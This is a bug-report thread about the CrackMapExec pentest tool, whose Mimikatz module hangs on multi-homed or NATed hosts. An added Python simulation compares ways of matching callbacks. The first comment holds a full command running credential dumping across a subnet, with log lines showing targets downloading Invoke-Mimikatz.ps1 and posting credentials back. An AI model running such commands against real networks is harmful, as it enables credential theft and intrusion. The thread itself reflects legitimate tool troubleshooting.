
Issue with multi-homed hosts

Open cclements opened this issue 7 years ago • 2 comments

Not sure if this is even worth addressing, but I just noticed on an engagement today that many of the hosts that never finish are in fact finishing, but are multi-homed. Here is example output from a system that I RDP'ed into to verify that all IPs were assigned to the same host:

cme smb 1.2.3.0/24 -u someuser -p 'somepassword' -M mimikatz
SMB         1.2.3.200  445 DOMAIN           [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB         1.2.3.200  445 DOMAIN           [+] DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.200                       [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       (null)\USER:PASSWORD
MIMIKATZ    1.2.3.200                       [+] Added 6 credential(s) to the database
MIMIKATZ    1.2.3.200                       [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_222944.log
SMB         1.2.3.205  445 DOMAIN           [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB         1.2.3.202  445 DOMAIN           [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB         1.2.3.210  445 DOMAIN           [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB         1.2.3.205  445 DOMAIN           [+] DOMAIN:USER:PASSWORD
SMB         1.2.3.202  445 DOMAIN           [+] DOMAIN:USER:PASSWORD
SMB         1.2.3.210  445 DOMAIN           [+] DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.205  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.210  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.202  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.200                       [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       (null)\USER:PASSWORD
MIMIKATZ    1.2.3.200                       [+] Added 6 credential(s) to the database
MIMIKATZ    1.2.3.200                       [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_223044.log
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       (null)\USER:PASSWORD
MIMIKATZ    1.2.3.200                       [+] Added 6 credential(s) to the database
MIMIKATZ    1.2.3.200                       [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_223045.log
MIMIKATZ    1.2.3.200                       [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       (null)\USER:PASSWORD
MIMIKATZ    1.2.3.200                       [+] Added 6 credential(s) to the database
MIMIKATZ    1.2.3.200                       [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_223052.log
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)

cclements, Apr 25 '17 03:04

Another interesting edge case. I'll definitely look into this but I have a feeling there won't be that much I can do. Cheers

byt3bl33d3r, Apr 25 '17 17:04

Another edge to add to this case :)

In a recent test I was able to crack an admin account on a remote subnet across a NATing firewall, and tried to hit them with the mimikatz cme module. The communication to the remote subnet succeeded; however, when the remote machine initiated the https connection back to the cme webserver, it was NATed by the firewall and therefore the originating IP did not match what cme expected, causing cme to error and wait indefinitely.

A fix for both of these edges might be for cme to issue private URLs (e.g. https://cme.box/some_hash) to match host responses on instead of name/ip.

cclements, Aug 11 '17 19:08
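To make the failure mode in both comments concrete, here is an added simulation (not CrackMapExec's own code) of the two ways a callback web server can attribute an incoming request to the host it launched against: by source IP, which is what breaks for the multi-homed host in the first comment and the NATed subnet in the second, and by a per-target random path as proposed above. The four target addresses are the ones from the output; the callback traffic and the firewall address are constructed.

```python
import secrets
from typing import Callable, Dict, List, Optional, Tuple

Callback = Tuple[str, str]  # (source IP seen by the web server, requested path)


class CallbackTracker:
    """Records which launched targets still owe a callback to the web server."""

    def __init__(self) -> None:
        self.pending: Dict[str, str] = {}  # callback token -> target IP

    def launch(self, target_ip: str) -> str:
        """Issue a unique callback path for this target and mark it pending."""
        token = secrets.token_hex(8)  # unguessable per-target identifier
        self.pending[token] = target_ip
        return f"/{token}"

    def waiting(self) -> List[str]:
        """Targets that have not been matched to any callback yet."""
        return sorted(set(self.pending.values()))


def correlate_by_ip(tracker: CallbackTracker, callbacks: List[Callback]) -> List[str]:
    """Attribute each callback to the target whose IP equals the source IP.

    A multi-homed or NATed host answers from a single address, so only that
    address is ever resolved and every other launch stays pending forever.
    """
    attributed = []
    for source_ip, _path in callbacks:
        attributed.append(source_ip)
        for token, ip in list(tracker.pending.items()):
            if ip == source_ip:
                del tracker.pending[token]
    return attributed


def correlate_by_token(tracker: CallbackTracker, callbacks: List[Callback]) -> List[Optional[str]]:
    """Attribute each callback by the token in its path; the source IP is irrelevant."""
    return [tracker.pending.pop(path.lstrip("/"), None) for _ip, path in callbacks]


def simulate(strategy: Callable, source_ip: str) -> Tuple[list, List[str]]:
    """Launch against four addresses of one host; every callback arrives from source_ip."""
    targets = ["1.2.3.200", "1.2.3.205", "1.2.3.202", "1.2.3.210"]  # from the issue output
    tracker = CallbackTracker()
    paths = [tracker.launch(t) for t in targets]
    callbacks = [(source_ip, p) for p in paths]  # constructed: one request per launch
    return strategy(tracker, callbacks), tracker.waiting()


if __name__ == "__main__":
    for name, fn in (("by_ip", correlate_by_ip), ("by_token", correlate_by_token)):
        seen, still_waiting = simulate(fn, "1.2.3.200")
        print(f"{name}: attributed={seen} waiting on {len(still_waiting)} host(s)")
```

With IP matching the multi-homed run ends exactly as in the output above, with three hosts waiting indefinitely, and a NATed source resolves nothing at all; token matching resolves every launch in both cases.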